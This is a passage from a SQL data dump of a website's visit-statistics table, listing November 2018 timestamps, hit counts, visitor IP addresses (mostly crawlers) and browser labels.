148.194','other'),(335610,1542547643,1,1,0,0,'46.229.168.143','other'),(335611,1542547798,1,1,0,0,'157.55.39.212','other'),(335612,1542547836,1,1,0,0,'54.36.148.96','other'),(335613,1542548138,1,1,0,0,'178.154.244.11','other'),(335614,1542548166,4,4,0,0,'216.244.66.241','other'),(335615,1542548284,1,1,0,0,'5.45.207.19','other'),(335616,1542548332,1,1,0,0,'66.249.66.156','chrome'),(335617,1542548456,1,1,0,0,'54.36.148.93','other'),(335618,1542548531,3,3,0,0,'207.46.13.138','other'),(335619,1542548648,2,2,0,0,'207.46.13.172','other'),(335620,1542548676,1,1,0,0,'141.8.142.103','other'),(335621,1542548690,1,1,0,0,'95.108.181.94','other'),(335622,1542548691,1,1,0,0,'5.45.207.8','other'),(335623,1542548737,1,1,0,0,'8.29.198.27','other'),(335624,1542548830,1,1,0,0,'54.36.148.197','other'),(335625,1542548873,1,1,0,0,'54.36.149.73','other'),(335626,1542548934,1,1,0,0,'54.36.148.104','other'),(335627,1542548963,1,1,0,0,'54.36.148.186','other'),(335628,1542549044,1,1,0,0,'54.36.148.80','other'),(335629,1542549050,1,1,0,0,'54.36.148.179','other'),(335630,1542549066,1,1,0,0,'141.8.183.22','other'),(335631,1542549216,1,1,0,0,'54.36.148.25','other'),(335632,1542549449,1,1,0,0,'95.163.255.103','other'),(335633,1542549456,1,1,0,0,'95.163.255.114','other'),(335634,1542549764,2,2,0,0,'207.46.13.207','other'),(335635,1542549795,1,1,0,0,'54.36.149.61','other'),(335636,1542549990,1,1,0,0,'46.229.168.148','other'),(335637,1542549995,1,1,0,0,'46.229.168.151','other'),(335638,1542550081,1,1,0,0,'54.36.148.215','other'),(335639,1542550104,1,1,0,0,'54.36.148.115','other'),(335640,1542550129,1,1,0,0,'54.36.148.25','other'),(335641,1542550253,2,2,0,0,'8.29.198.27','other'),(335642,1542550331,4,4,0,0,'207.46.13.138','other'),(335643,1542550474,4,4,0,0,'207.46.13.172','other'),(335644,1542550824,1,1,0,0,'54.36.148.233','other'),(335645,1542551122,1,1,0,0,'54.36.148.107','other'),(335646,1542551154,1,1,0,0,'207.46.13.207','other'),(335647,1542551157,1,1,0,0,'54.36.149.52','other'),(335648,1542551172,1,1,0,0,'216.244.66.241','other'),(335649,1542551234,1,1,0,0,'54.36.148.206','other'),(335650,1542551277,24,24,0,0,'54.82.73.21','other'),(335651,1542551516,1,1,0,0,'54.36.148.144','other'),(335652,1542551629,5,5,0,0,'207.46.13.138','other'),(335653,1542551740,1,1,0,0,'46.229.168.133','other'),(335654,1542551868,4,4,0,0,'91.209.11.236','other'),(335655,1542551983,1,1,0,0,'54.36.149.1','other'),(335656,1542552046,1,1,0,0,'66.249.66.156','chrome'),(335657,1542552207,1,1,0,0,'54.36.148.136','other'),(335658,1542552281,4,4,0,0,'157.55.39.212','other'),(335659,1542552368,4,4,0,0,'54.82.73.21','other'),(335660,1542552521,1,1,0,0,'46.229.168.146','other'),(335661,1542552594,1,1,0,0,'54.36.148.10','other'),(335662,1542552702,1,1,0,0,'207.46.13.207','other'),(335663,1542552772,1,1,0,0,'5.58.188.222','opera'),(335664,1542552823,1,1,0,0,'54.36.149.64','other'),(335665,1542552936,2,2,0,0,'91.209.11.236','other'),(335666,1542552942,1,1,0,0,'54.36.149.23','other'),(335667,1542553215,2,2,0,0,'207.46.13.172','other'),(335668,1542553289,4,4,0,0,'157.55.39.212','other'),(335669,1542553315,1,1,0,0,'54.36.148.145','other'),(335670,1542553500,1,1,0,0,'66.249.66.154','chrome'),(335671,1542553507,2,2,0,0,'66.249.66.152','chrome'),(335672,1542553518,1,1,0,0,'54.36.148.52','other'),(335673,1542553585,4,4,0,0,'54.82.73.21','other'),(335674,1542553690,1,1,0,0,'54.36.149.51','other'),(335675,1542553841,1,1,0,0,'54.36.149.7','other'),(335676,1542554261,1,1,0,0,'66.249.66.155','chrome'),(335677,1542554416,2,2,0,0,'207.46.13.138','other'),(335678,1542554503,1,1,0,0,'46.229.168.142','other'),(335679,1542554508,1,1,0,0,'46.229.168.134','other'),(335680,1542554613,2,2,0,0,'46.211.134.170','chrome'),(335681,1542555080,1,1,0,0,'54.36.148.158','other'),(335682,1542555297,1,1,0,0,'54.36.149.54','other'),(335683,1542555387,1,1,0,0,'46.229.168.153','other'),(335684,1542555391,1,1,0,0,'46.229.168.145','other'),(335685,1542555872,1,1,0,0,'54.36.148.162','other'),(335686,1542555926,1,1,0,0,'46.229.168.150','other'),(335687,1542556025,2,2,0,0,'207.46.13.172','other'),(335688,1542556157,11,11,0,0,'178.154.244.11','other'),(335689,1542556177,13,13,0,0,'178.154.244.29','other'),(335690,1542556213,1,1,0,0,'95.163.255.97','other'),(335691,1542556216,1,1,0,0,'95.163.255.98','other'),(335692,1542556219,1,1,0,0,'54.36.148.215','other'),(335693,1542556237,2,2,0,0,'5.45.207.79','other'),(335694,1542556278,1,1,0,0,'54.36.148.71','other'),(335695,1542556290,6,6,0,0,'157.55.39.212','other'),(335696,1542556296,1,1,0,0,'95.108.213.4','other'),(335697,1542556315,1,1,0,0,'54.36.148.157','other'),(335698,1542556386,1,1,0,0,'66.249.66.155','chrome'),(335699,1542556390,2,2,0,0,'66.249.66.152','chrome'),(335700,1542556566,3,3,0,0,'87.250.224.47','other'),(335701,1542556574,1,1,0,0,'54.36.149.86','other'),(335702,1542556820,2,2,0,0,'5.255.253.16','other'),(335703,1542556822,1,1,0,0,'95.108.181.94','other'),(335704,1542556826,1,1,0,0,'37.9.113.38','other'),(335705,1542556861,1,1,0,0,'54.36.149.7','other'),(335706,1542556862,1,1,0,0,'95.108.213.50','other'),(335707,1542556900,3,3,0,0,'207.46.13.207','other'),(335708,1542556910,3,3,0,0,'95.108.181.83','other'),(335709,1542556915,2,2,0,0,'178.154.171.30','other'),(335710,1542556924,1,1,0,0,'5.45.207.76','other'),(335711,1542557056,1,1,0,0,'54.36.148.44','other'),(335712,1542557073,1,1,0,0,'66.249.66.42','chrome'),(335713,1542557074,3,3,0,0,'178.154.244.11','other'),(335714,1542557084,4,4,0,0,'207.46.13.172','other'),(335715,1542557111,2,2,0,0,'5.45.207.19','other'),(335716,1542557160,4,4,0,0,'178.154.244.29','other'),(335717,1542557285,1,1,0,0,'54.36.148.217','other'),(335718,1542557287,1,1,0,0,'5.45.207.79','other'),(335719,1542557292,3,3,0,0,'207.46.13.138','other'),(335720,1542557299,1,1,0,0,'213.180.203.23','other'),(335721,1542557388,2,2,0,0,'37.9.113.103','other'),(335722,1542557389,1,1,0,0,'178.154.171.17','other'),(335723,1542557432,1,1,0,0,'178.154.244.21','other'),(335724,1542557447,1,1,0,0,'141.8.142.103','other'),(335725,1542557486,3,3,0,0,'157.55.39.212','other'),(335726,1542557518,1,1,0,0,'141.8.142.65','other'),(335727,1542557587,2,2,0,0,'141.8.142.38','other'),(335728,1542557598,1,1,0,0,'54.36.148.203','other'),(335729,1542557612,1,1,0,0,'213.180.203.17','other'),(335730,1542557643,1,1,0,0,'178.154.171.69','other'),(335731,1542557654,1,1,0,0,'178.154.200.8','other'),(335732,1542557667,4,4,0,0,'141.8.142.191','other'),(335733,1542557702,1,1,0,0,'141.8.183.22','other'),(335734,1542557714,2,2,0,0,'213.180.203.40','other'),(335735,1542557900,1,1,0,0,'95.108.213.4','other'),(335736,1542557992,1,1,0,0,'178.154.244.11','other'),(335737,1542558358,3,3,0,0,'207.46.13.138','other'),(335738,1542558582,1,1,0,0,'213.180.203.23','other'),(335739,1542558619,1,1,0,0,'13.57.233.99','chrome'),(335740,1542558692,2,2,0,0,'157.55.39.212','other'),(335741,1542558745,4,4,0,0,'207.46.13.207','other'),(335742,1542559179,4,4,0,0,'207.46.13.172','other'),(335743,1542559385,1,1,0,0,'54.36.149.87','other'),(335744,1542559401,1,1,0,0,'54.36.148.178','other'),(335745,1542559575,1,1,0,0,'8.29.198.25','other'),(335746,1542559775,1,1,0,0,'54.36.148.58','other'),(335747,1542559853,1,1,0,0,'91.200.115.106','chrome'),(335748,1542559990,1,1,0,0,'178.255.215.94','other'),(335749,1542560002,1,1,0,0,'95.134.205.147','chrome'),(335750,1542560045,1,1,0,0,'54.36.148.78','other'),(335751,1542560064,1,1,0,0,'54.36.149.51','other'),(335752,1542560180,1,1,0,0,'46.211.74.27','chrome'),(335753,1542560223,1,1,0,0,'54.36.148.35','other'),(335754,1542560307,1,1,0,0,'54.36.149.59','other'),(335755,1542560345,1,1,0,0,'54.36.149.46','other'),(335756,1542560458,2,2,0,0,'207.46.13.207','other'),(335757,1542560573,1,1,0,0,'54.36.148.168','other'),(335758,1542560859,1,1,0,0,'54.36.148.171','other'),(335759,1542560945,1,1,0,0,'46.229.168.135','other'),(335760,1542561040,1,1,0,0,'66.249.66.61','chrome'),(335761,1542561041,2,2,0,0,'66.249.66.44','chrome'),(335762,1542561046,1,1,0,0,'54.36.148.165','other'),(335763,1542561064,4,4,0,0,'207.46.13.138','other'),(335764,1542561085,1,1,0,0,'8.29.198.27','other'),(335765,1542561191,4,4,0,0,'207.46.13.172','other'),(335766,1542561260,1,1,0,0,'54.36.148.224','other'),(335767,1542561283,1,1,0,0,'54.36.149.19','other'),(335768,1542561411,1,1,0,0,'54.36.149.25','other'),(335769,1542561689,1,1,0,0,'8.29.198.26','other'),(335770,1542561727,1,1,0,0,'178.154.244.29','other'),(335771,1542561933,1,1,0,0,'54.36.148.132','other'),(335772,1542562057,1,1,0,0,'66.249.66.156','chrome'),(335773,1542562069,1,1,0,0,'93.78.184.53','chrome'),(335774,1542562146,1,1,0,0,'207.46.13.172','other'),(335775,1542562229,1,1,0,0,'54.36.148.150','other'),(335776,1542562412,1,1,0,0,'5.58.95.49','firefox'),(335777,1542562749,1,1,0,0,'54.36.148.223','other'),(335778,1542562890,1,1,0,0,'46.211.74.27','chrome'),(335779,1542563034,2,2,0,0,'46.229.168.133','other'),(335780,1542563043,1,1,0,0,'178.154.244.29','other'),(335781,1542563075,1,1,0,0,'54.36.148.239','other'),(335782,1542563112,1,1,0,0,'54.36.148.255','other'),(335783,1542563123,1,1,0,0,'54.36.148.117','other'),(335784,1542563283,1,1,0,0,'54.36.149.44','other'),(335785,1542563524,1,1,0,0,'66.249.66.152','chrome'),(335786,1542563549,1,1,0,0,'93.78.184.243','firefox'),(335787,1542563614,2,2,0,0,'207.46.13.207','other'),(335788,1542563633,1,1,0,0,'46.211.148.194','chrome'),(335789,1542563717,1,1,0,0,'178.154.171.30','other'),(335790,1542563741,2,2,0,0,'207.46.13.138','other'),(335791,1542563745,1,1,0,0,'66.249.66.154','chrome'),(335792,1542563785,1,1,0,0,'46.229.168.143','other'),(335793,1542563939,1,1,0,0,'54.36.148.182','other'),(335794,1542564052,4,4,0,0,'157.55.39.212','other'),(335795,1542564258,1,1,0,0,'46.229.168.144','other'),(335796,1542564260,1,1,0,0,'46.229.168.140','other'),(335797,1542564416,1,1,0,0,'54.36.148.255','other'),(335798,1542564434,2,2,0,0,'178.154.244.29','other'),(335799,1542564848,1,1,0,0,'54.36.148.132','other'),(335800,1542564941,2,2,0,0,'66.249.66.154','chrome'),(335801,1542565062,6,6,0,0,'207.46.13.207','other'),(335802,1542565093,4,4,0,0,'157.55.39.212','other'),(335803,1542565353,2,2,0,0,'162.210.196.129','other'),(335804,1542565461,1,1,0,0,'66.249.66.42','chrome'),(335805,1542565501,1,1,0,0,'178.154.244.29','other'),(335806,1542565559,4,4,0,0,'207.46.13.172','other'),(335807,1542566390,4,4,0,0,'157.55.39.212','other'),(335808,1542566414,2,2,0,0,'207.46.13.138','other'),(335809,1542566662,1,1,0,0,'93.78.184.53','chrome'),(335810,1542566756,15,15,0,0,'69.197.177.50','other'),(335811,1542566801,1,1,0,0,'176.120.100.228','firefox'),(335812,1542566906,1,1,0,0,'207.46.13.172','other'),(335813,1542566981,1,1,0,0,'46.229.168.146','other'),(335814,1542567199,1,1,0,0,'66.249.66.44','chrome'),(335815,1542567333,2,2,0,0,'207.46.13.207','other'),(335816,1542567354,1,1,0,0,'207.46.13.138','other'),(335817,1542567668,2,2,0,0,'157.55.39.212','other'),(335818,1542568074,1,1,0,0,'54.36.148.161','other'),(335819,1542568111,6,6,0,0,'207.46.13.172','other'),(335820,1542568229,1,1,0,0,'54.36.148.134','other'),(335821,1542568394,1,1,0,0,'54.36.148.71','other'),(335822,1542568571,2,2,0,0,'207.46.13.207','other'),(335823,1542568700,1,1,0,0,'93.171.214.221','other'),(335824,1542569028,2,2,0,0,'207.46.13.138','other'),(335825,1542569080,1,1,0,0,'46.229.168.135','other'),(335826,1542569112,2,2,0,0,'157.55.39.212','other'),(335827,1542569184,1,1,0,0,'144.76.81.72','other'),(335828,1542569499,2,2,0,0,'207.46.13.207','other'),(335829,1542569663,4,4,0,0,'207.46.13.172','other'),(335830,1542569739,1,1,0,0,'5.58.188.222','other'),(335831,1542569976,1,1,0,0,'46.229.168.149','other'),(335832,1542569980,1,1,0,0,'46.229.168.130','other'),(335833,1542570126,8,8,0,0,'207.46.13.138','other'),(335834,1542570243,1,1,0,0,'46.229.168.145','other'),(335835,1542570419,1,1,0,0,'8.29.198.25','other'),(335836,1542570553,1,0,1,0,'66.249.66.59',''),(335837,1542570554,1,0,1,0,'66.249.66.42',''),(335838,1542570762,1,1,0,0,'207.46.13.172','other'),(335839,1542570816,4,4,0,0,'207.46.13.207','other'),(335840,1542571067,2,2,0,0,'66.249.66.155','chrome'),(335841,1542571068,1,1,0,0,'66.249.66.154','chrome'),(335842,1542571107,1,1,0,0,'66.249.66.152','chrome'),(335843,1542571429,1,1,0,0,'46.229.168.139','other'),(335844,1542571431,1,1,0,0,'46.229.168.148','other'),(335845,1542571472,1,1,0,0,'66.249.66.156','chrome'),(335846,1542571913,1,1,0,0,'8.29.198.25','other'),(335847,1542571992,2,2,0,0,'207.46.13.207','other'),(335848,1542572058,1,1,0,0,'46.229.168.150','other'),(335849,1542572534,1,1,0,0,'8.29.198.27','other'),(335850,1542572608,1,1,0,0,'54.36.149.76','other'),(335851,1542572699,2,2,0,0,'213.180.203.40','other'),(335852,1542572753,1,1,0,0,'213.180.203.48','other'),(335853,1542572815,5,5,0,0,'207.46.13.138','other'),(335854,1542572856,3,3,0,0,'207.46.13.172','other'),(335855,1542572904,1,1,0,0,'5.255.253.25','other'),(335856,1542572909,1,1,0,0,'37.9.113.38','other'),(335857,1542572918,2,2,0,0,'95.108.181.83','other'),(335858,1542572919,1,1,0,0,'66.249.66.156','chrome'),(335859,1542572956,1,1,0,0,'66.249.66.61','chrome'),(335860,1542572958,1,1,0,0,'66.249.66.40','chrome'),(335861,1542572997,1,1,0,0,'54.36.148.98','other'),(335862,1542573026,1,1,0,0,'95.108.181.94','other'),(335863,1542573031,1,1,0,0,'5.45.207.76','other'),(335864,1542573034,1,1,0,0,'5.45.207.19','other'),(335865,1542573054,2,2,0,0,'93.158.166.7','other'),(335866,1542573087,2,2,0,0,'213.180.203.53','other'),(335867,1542573187,1,1,0,0,'95.108.213.4','other'),(335868,1542573240,2,2,0,0,'37.9.113.148','other'),(335869,1542573256,1,1,0,0,'46.229.168.137','other'),(335870,1542573312,1,1,0,0,'87.250.224.107','other'),(335871,1542573394,1,1,0,0,'141.8.142.38','other'),(335872,1542573462,1,1,0,0,'178.154.244.29','other'),(335873,1542573464,1,1,0,0,'178.154.171.69','other'),(335874,1542573538,1,1,0,0,'54.36.148.239','other'),(335875,1542573541,1,1,0,0,'54.36.148.149','other'),(335876,1542573723,1,1,0,0,'54.36.148.190','other'),(335877,1542573943,1,1,0,0,'46.229.168.136','other'),(335878,1542573948,1,1,0,0,'46.229.168.129','other'),(335879,1542574015,1,1,0,0,'66.249.66.157','chrome'),(335880,1542574016,1,1,0,0,'66.249.66.154','chrome'),(335881,1542574048,1,1,0,0,'178.150.255.111','firefox'),(335882,1542574081,1,1,0,0,'54.36.148.120','other'),(335883,1542574116,1,1,0,0,'157.55.39.212','other'),(335884,1542574135,1,1,0,0,'46.229.168.147','other'),(335885,1542574311,2,2,0,0,'66.249.66.156','chrome'),(335886,1542574313,1,1,0,0,'66.249.66.152','chrome'),(335887,1542574521,1,1,0,0,'188.163.32.4','opera'),(335888,1542575006,2,2,0,0,'207.46.13.172','other'),(335889,1542575010,1,1,0,0,'54.36.148.200','other'),(335890,1542575089,1,1,0,0,'54.36.148.230','other'),(335891,1542575170,1,1,0,0,'54.36.148.166','other'),(335892,1542575171,1,1,0,0,'54.36.148.147','other'),(335893,1542575330,1,1,0,0,'54.36.148.186','other'),(335894,1542575474,1,1,0,0,'54.36.148.236','other'),(335895,1542575489,4,4,0,0,'207.46.13.138','other'),(335896,1542575520,1,1,0,0,'66.249.66.152','chrome'),(335897,1542575680,2,2,0,0,'188.163.32.4','chrome'),(335898,1542576402,1,1,0,0,'46.229.168.142','other'),(335899,1542576552,1,1,0,0,'46.229.168.135','other'),(335900,1542576557,4,4,0,0,'207.46.13.138','other'),(335901,1542576599,1,1,0,0,'54.36.148.26','other'),(335902,1542576644,1,1,0,0,'54.36.148.79','other'),(335903,1542576664,2,2,0,0,'207.46.13.172','other'),(335904,1542576738,4,4,0,0,'207.46.13.207','other'),(335905,1542577012,1,1,0,0,'54.36.148.39','other'),(335906,1542577097,1,1,0,0,'54.36.149.56','other'),(335907,1542577184,1,1,0,0,'66.249.66.152','chrome'),(335908,1542577231,7,7,0,0,'157.55.39.212','other'),(335909,1542577381,1,1,0,0,'91.196.150.177','chrome'),(335910,1542577417,1,1,0,0,'54.36.148.183','other'),(335911,1542577585,1,1,0,0,'54.36.148.213','other'),(335912,1542577715,1,1,0,0,'54.36.148.21','other'),(335913,1542577950,1,1,0,0,'54.36.148.87','other'),(335914,1542577956,6,6,0,0,'207.46.13.172','other'),(335915,1542578098,1,1,0,0,'46.229.168.138','other'),(335916,1542578100,1,1,0,0,'46.229.168.134','other'),(335917,1542578241,1,1,0,0,'66.249.66.152','chrome'),(335918,1542578257,1,1,0,0,'54.36.148.161','other'),(335919,1542578270,1,1,0,0,'54.36.148.113','other'),(335920,1542578326,1,1,0,0,'54.36.149.62','other'),(335921,1542578650,1,1,0,0,'54.36.148.114','other'),(335922,1542578655,1,1,0,0,'54.36.149.26','other'),(335923,1542578900,4,4,0,0,'207.46.13.172','other'),(335924,1542579030,6,6,0,0,'207.46.13.207','other'),(335925,1542579103,1,1,0,0,'54.36.148.12','other'),(335926,1542579249,2,2,0,0,'78.111.189.101','chrome'),(335927,1542579401,1,1,0,0,'54.36.148.179','other'),(335928,1542579643,1,1,0,0,'54.36.148.68','other'),(335929,1542579648,1,1,0,0,'54.36.148.44','other'),(335930,1542579976,1,1,0,0,'46.229.168.153','other'),(335931,1542580089,4,4,0,0,'207.46.13.138','other'),(335932,1542580261,4,4,0,0,'207.46.13.207','other'),(335933,1542580272,1,1,0,0,'54.36.148.192','other'),(335934,1542580723,2,2,0,0,'66.249.66.154','chrome'),(335935,1542580775,4,4,0,0,'207.46.13.172','other'),(335936,1542580976,1,1,0,0,'46.229.168.141','other'),(335937,1542581019,6,6,0,0,'157.55.39.212','other'),(335938,1542581023,1,1,0,0,'46.229.168.129','other'),(335939,1542581026,1,1,0,0,'46.229.168.145','other'),(335940,1542581028,1,1,0,0,'46.229.168.144','other'),(335941,1542581062,2,2,0,0,'207.46.13.138','other'),(335942,1542581122,2,2,0,0,'188.163.18.116','chrome'),(335943,1542581187,1,1,0,0,'54.36.148.240','other'),(335944,1542581251,1,1,0,0,'8.29.198.27','other'),(335945,1542581279,1,1,0,0,'54.36.149.34','other'),(335946,1542581496,1,1,0,0,'46.229.168.133','other'),(335947,1542581499,1,1,0,0,'46.229.168.143','other'),(335948,1542581867,1,1,0,0,'54.36.148.251','other'),(335949,1542582155,1,1,0,0,'54.36.149.1','other'),(335950,1542582249,1,1,0,0,'54.36.149.51','other'),(335951,1542582432,4,4,0,0,'207.46.13.207','other'),(335952,1542582575,1,1,0,0,'54.36.149.66','other'),(335953,1542582742,2,2,0,0,'8.29.198.26','other'),(335954,1542582801,3,3,0,0,'207.46.13.172','other'),(335955,1542583125,1,1,0,0,'54.36.148.16','other'),(335956,1542583369,1,1,0,0,'66.249.66.155','chrome'),(335957,1542583370,1,1,0,0,'66.249.66.156','chrome'),(335958,1542583438,1,1,0,0,'178.154.244.21','other'),(335959,1542583528,1,1,0,0,'54.36.148.24','other'),(335960,1542583550,1,1,0,0,'54.36.148.178','other'),(335961,1542583566,1,1,0,0,'54.36.148.163','other'),(335962,1542583591,4,4,0,0,'157.55.39.212','other'),(335963,1542583870,2,2,0,0,'207.46.13.172','other'),(335964,1542583911,2,2,0,0,'207.46.13.207','other'),(335965,1542584109,1,1,0,0,'54.36.148.208','other'),(335966,1542584161,1,1,0,0,'54.36.149.64','other'),(335967,1542584198,1,1,0,0,'54.36.148.106','other'),(335968,1542584307,2,2,0,0,'207.46.13.138','other'),(335969,1542584415,1,1,0,0,'54.36.148.119','other'),(335970,1542584591,1,1,0,0,'66.249.66.156','chrome'),(335971,1542584933,1,1,0,0,'54.36.148.121','other'),(335972,1542584947,1,1,0,0,'54.36.148.113','other'),(335973,1542585066,1,1,0,0,'54.36.148.163','other'),(335974,1542585090,3,3,0,0,'157.55.39.212','other'),(335975,1542585092,1,1,0,0,'188.163.32.195','firefox'),(335976,1542585257,3,3,0,0,'207.46.13.138','other'),(335977,1542585320,1,1,0,0,'109.70.100.18','other'),(335978,1542585323,1,1,0,0,'178.17.166.147','other'),(335979,1542585422,1,1,0,0,'54.36.149.82','other'),(335980,1542585505,3,3,0,0,'66.249.66.154','chrome'),(335981,1542585521,1,1,0,0,'176.120.100.228','msie'),(335982,1542585706,1,1,0,0,'54.36.148.15','other'),(335983,1542585922,1,1,0,0,'46.229.168.134','other'),(335984,1542585939,1,1,0,0,'46.229.168.142','other'),(335985,1542585998,1,1,0,0,'54.36.149.101','other'),(335986,1542586147,1,1,0,0,'66.249.66.157','chrome'),(335987,1542586249,2,2,0,0,'66.249.66.155','chrome'),(335988,1542586289,1,1,0,0,'66.249.66.156','chrome'),(335990,1542586317,1,1,0,0,'66.249.66.61','chrome'),(335991,1542586318,1,1,0,0,'66.249.66.40','chrome'),(335992,1542586324,4,4,0,0,'157.55.39.212','other'),(335993,1542586465,4,4,0,0,'207.46.13.138','other'),(335994,1542586493,2,2,0,0,'207.46.13.207','other'),(335995,1542586869,1,1,0,0,'54.36.148.221','other'),(335996,1542586916,1,1,0,0,'54.36.149.74','other'),(335997,1542586956,6,6,0,0,'207.46.13.172','other'),(335998,1542587035,1,1,0,0,'46.229.168.150','other'),(335999,1542587111,1,1,0,0,'66.249.66.154','chrome'),(336000,1542587790,1,1,0,0,'207.46.13.138','other'),(336001,1542587864,1,1,0,0,'54.36.148.102','other'),(336002,1542587964,1,1,0,0,'54.36.148.95','other'),(336003,1542588082,4,4,0,0,'207.46.13.172','other'),(336004,1542588169,37,37,0,0,'54.221.9.6','other'),(336005,1542588241,1,1,0,0,'54.36.148.217','other'),(336006,1542588388,1,1,0,0,'54.36.148.152','other'),(336007,1542588420,1,1,0,0,'54.36.148.239','other'),(336008,1542588685,1,1,0,0,'54.36.148.36','other'),(336009,1542588713,1,1,0,0,'54.36.148.234','other'),(336010,1542589143,1,1,0,0,'95.163.255.107','other'),(336011,1542589150,1,1,0,0,'95.163.255.105','other'),(336012,1542589262,18,18,0,0,'54.221.9.6','other'),(336013,1542589329,4,4,0,0,'207.46.13.138','other'),(336014,1542589607,1,1,0,0,'119.145.148.202','other'),(336015,1542589655,1,1,0,0,'46.229.168.140','other'),(336016,1542589788,1,1,0,0,'54.36.149.5','other'),(336017,1542589854,1,1,0,0,'46.229.168.145','other'),(336018,1542589905,2,2,0,0,'213.180.203.23','other'),(336019,1542589956,1,1,0,0,'141.8.142.81','other'),(336020,1542589993,2,2,0,0,'178.154.244.21','other'),(336021,1542590011,1,1,0,0,'54.36.148.29','other'),(336022,1542590092,2,2,0,0,'178.154.200.8','other'),(336023,1542590100,2,2,0,0,'87.250.224.47','other'),(336024,1542590121,4,4,0,0,'207.46.13.207','other'),(336025,1542590126,1,1,0,0,'141.8.142.103','other'),(336026,1542590144,3,3,0,0,'95.108.213.4','other'),(336027,1542590192,2,2,0,0,'37.9.113.148','other'),(336028,1542590239,1,1,0,0,'54.36.148.171','other'),(336029,1542590243,1,1,0,0,'95.108.181.83','other'),(336030,1542590256,20,20,0,0,'54.221.9.6','other'),(336031,1542590261,2,2,0,0,'213.180.203.61','other'),(336032,1542590275,3,3,0,0,'141.8.142.38','other'),(336033,1542590343,2,2,0,0,'87.250.224.107','other'),(336034,1542590411,1,1,0,0,'5.45.207.19','other'),(336035,1542590422,4,4,0,0,'141.8.142.65','other'),(336036,1542590424,3,3,0,0,'141.8.142.162','other'),(336037,1542590557,1,1,0,0,'178.154.171.69','other'),(336038,1542590559,1,1,0,0,'95.108.213.50','other'),(336039,1542590561,2,2,0,0,'178.154.171.30','other'),(336040,1542590608,2,2,0,0,'207.46.13.138','other'),(336041,1542590728,1,1,0,0,'5.255.253.25','other'),(336042,1542590835,1,1,0,0,'178.154.200.48','other'),(336043,1542590957,1,1,0,0,'213.180.203.40','other'),(336044,1542591029,4,4,0,0,'157.55.39.212','other'),(336045,1542591041,3,3,0,0,'5.255.253.16','other'),(336046,1542591058,3,3,0,0,'141.8.183.22','other'),(336047,1542591177,2,2,0,0,'95.108.213.4','other'),(336048,1542591178,1,1,0,0,'178.154.171.27','other'),(336049,1542591301,2,2,0,0,'207.46.13.207','other'),(336050,1542591322,1,1,0,0,'87.250.224.107','other'),(336051,1542591341,25,25,0,0,'54.221.9.6','other'),(336052,1542591350,1,1,0,0,'54.36.148.60','other'),(336053,1542591401,1,1,0,0,'37.9.113.148','other'),(336054,1542591429,1,1,0,0,'54.36.148.212','other'),(336055,1542591432,1,1,0,0,'54.36.148.56','other'),(336056,1542591492,1,1,0,0,'54.36.148.207','other'),(336057,1542591502,1,1,0,0,'178.154.171.30','other'),(336058,1542591621,2,2,0,0,'178.154.171.69','other'),(336059,1542591645,1,1,0,0,'46.229.168.132','other'),(336060,1542591647,1,1,0,0,'54.36.148.78','other'),(336061,1542591658,1,1,0,0,'141.8.142.191','other'),(336062,1542591700,1,1,0,0,'95.108.213.50','other'),(336063,1542591742,1,1,0,0,'46.229.168.129','other'),(336064,1542591744,1,1,0,0,'46.229.168.147','other'),(336065,1542591747,1,1,0,0,'93.158.166.7','other'),(336066,1542591756,5,5,0,0,'207.46.13.172','other'),(336067,1542591758,1,1,0,0,'37.9.113.38','other'),(336068,1542591790,2,2,0,0,'213.180.203.61','other'),(336069,1542591982,1,1,0,0,'178.154.244.21','other'),(336070,1542592007,1,1,0,0,'141.8.142.38','other'),(336071,1542592058,1,1,0,0,'178.154.244.11','other'),(336072,1542592072,2,2,0,0,'207.46.13.39','other'),(336073,1542592094,1,1,0,0,'8.29.198.27','other'),(336074,1542592149,1,1,0,0,'54.36.149.96','other'),(336075,1542592277,1,1,0,0,'141.8.183.22','other'),(336076,1542592282,19,19,0,0,'54.221.9.6','other'),(336077,1542592370,1,1,0,0,'141.8.142.65','other'),(336078,1542592376,1,1,0,0,'54.36.148.38','other'),(336079,1542592385,1,1,0,0,'95.163.255.99','other'),(336080,1542592388,1,1,0,0,'95.163.255.93','other'),(336081,1542592653,4,4,0,0,'207.46.13.207','other'),(336082,1542592712,1,1,0,0,'54.36.148.124','other'),(336083,1542592837,1,1,0,0,'54.36.148.168','other'),(336084,1542592979,1,1,0,0,'54.36.148.169','other'),(336085,1542593221,1,1,0,0,'54.36.148.98','other'),(336086,1542593291,3,3,0,0,'54.221.9.6','other'),(336087,1542593343,1,1,0,0,'66.249.66.154','chrome'),(336088,1542593455,1,1,0,0,'66.249.66.156','chrome'),(336089,1542593467,1,1,0,0,'54.36.148.172','other'),(336090,1542593469,1,1,0,0,'66.249.66.152','chrome'),(336091,1542593554,1,1,0,0,'54.36.149.42','other'),(336092,1542593558,1,1,0,0,'54.36.148.47','other'),(336093,1542593578,1,1,0,0,'8.29.198.25','other'),(336094,1542594005,1,1,0,0,'46.229.168.141','other'),(336095,1542594037,1,1,0,0,'54.36.148.179','other'),(336096,1542594038,6,6,0,0,'207.46.13.172','other'),(336097,1542594175,1,1,0,0,'54.36.148.32','other'),(336098,1542594219,1,1,0,0,'8.29.198.26','other'),(336099,1542594406,2,2,0,0,'37.145.124.23','other'),(336100,1542594503,2,2,0,0,'207.46.13.207','other'),(336101,1542594571,5,5,0,0,'157.55.39.212','other'),(336102,1542594736,2,2,0,0,'66.249.66.44','chrome'),(336103,1542595021,1,1,0,0,'54.36.148.68','other'),(336104,1542595222,1,1,0,0,'66.249.66.59','chrome'),(336105,1542595744,2,2,0,0,'54.191.113.169','chrome'),(336106,1542595769,6,6,0,0,'207.46.13.39','other'),(336107,1542595785,1,1,0,0,'213.180.203.23','other'),(336108,1542596179,1,1,0,0,'46.229.168.141','other'),(336109,1542596277,2,2,0,0,'207.46.13.207','other'),(336110,1542596708,2,2,0,0,'207.46.13.172','other'),(336111,1542596806,4,4,0,0,'157.55.39.212','other'),(336112,1542597313,1,1,0,0,'87.250.224.99','other'),(336113,1542597609,1,1,0,0,'54.36.148.211','other'),(336114,1542597724,1,1,0,0,'157.55.39.212','other'),(336115,1542597925,6,6,0,0,'207.46.13.207','other'),(336116,1542597989,1,1,0,0,'207.46.13.39','other'),(336117,1542598328,1,1,0,0,'54.36.148.212','other'),(336118,1542599889,1,1,0,0,'54.36.148.65','other'),(336119,1542599914,1,1,0,0,'66.249.66.154','chrome'),(336120,1542600018,2,2,0,0,'52.53.201.78','chrome'),(336121,1542600215,1,1,0,0,'46.229.168.142','other'),(336122,1542600372,2,2,0,0,'207.46.13.172','other'),(336123,1542600402,2